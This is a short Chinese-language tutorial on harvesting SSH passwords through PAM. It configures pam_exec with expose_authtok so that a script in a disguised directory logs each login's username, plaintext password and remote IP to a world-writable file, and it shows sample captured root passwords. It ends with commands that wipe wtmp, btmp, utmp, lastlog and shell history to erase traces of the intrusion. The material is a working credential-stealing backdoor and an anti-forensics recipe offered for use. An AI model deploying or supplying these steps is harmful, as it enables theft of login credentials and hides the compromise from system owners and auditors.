PAM抓取密码

PAM抓取密码

1.确保sshd_config中的UsePAM yes

vi /etc/ssh/sshd_config

UsePAM yes

2./etc/pam.d/sshd添加下面这行

auth optional pam_exec.so quiet expose_authtok /usr/src/debug/sshd.sh

3./usr/src/debug/sshd.sh文件内容

#!/bin/sh

echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /usr/src/debug/sshd.log

4.给权限

chmod 777 /usr/src/debug/sshd.sh

5.检查结果

cat /usr/src/debug/sshd.log

Sat Nov 29 18:50:01 CST 2025 root Abc@123123 1.13.253.231

Sat Nov 29 18:50:03 CST 2025 root Qa12345678 1.13.253.231

Sat Nov 29 18:50:07 CST 2025 root Merlin01 1.13.253.231

Sat Nov 29 18:50:11 CST 2025 root 123456xX 1.13.253.231

6.最后去比对那个ip登录成功了

-bash-4.2# w

18:54:19 up 236 days, 21:10, 1 user, load average: 0.10, 0.10, 0.12

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

root pts/1 127.0.0.1 18:27 3.00s 0.02s 0.00s w

-bash-4.2# last

root pts/1 127.0.0.1 Sat Nov 29 18:27 still logged in

============================================

清除记录

> /var/log/wtmp

> /var/log/btmp

> /var/run/utmp

> /var/log/lastlog

cat /dev/null > ~/.bash_history

history -c

history -w